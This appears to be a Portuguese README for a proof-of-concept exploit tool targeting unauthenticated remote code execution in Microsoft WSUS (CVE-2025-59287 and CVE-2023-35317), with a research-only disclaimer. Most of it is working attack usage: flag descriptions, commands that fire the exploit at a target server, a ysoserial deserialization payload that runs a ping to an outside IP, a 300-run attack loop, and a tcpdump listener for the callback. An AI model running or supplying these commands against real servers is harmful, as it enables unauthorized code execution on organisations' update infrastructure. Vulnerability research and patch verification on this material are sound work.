
PoC de RCE não autenticado no Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317
Dentro de CVE-2025-59287: SoapFormatter RCE no WSUS: https://shellcode.blog/wsus-cve-2025-59287-investigation/
Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis nem se responsabilizam pelo uso indevido do software. Use com responsabilidade.
Flags obrigatórias:
--target-url – URL base do servidor WSUS alvo, ex.: http://WIN-246JC0TE3BB.vuln.local:8530--cve – Um de CVE-2023-35317 ou CVE-2025-59287Flags opcionais:
--dns-name – Nome DNS do cliente usado em solicitações SOAP (padrão: bugcrowd.local)--random – Prefixa --dns-name com um subdomínio aleatório para que cada execução apareça como um novo cliente--payload – Payload ysoserial personalizado codificado em base64; se omitido, um payload embutido é usado para o --cve escolhido--debug – Ativa o log de depuração detalhado (linhas [DEBUG])python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --randompython3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64 (ou confie no payload embutido para --cve CVE-2023-35317)for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;donesudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done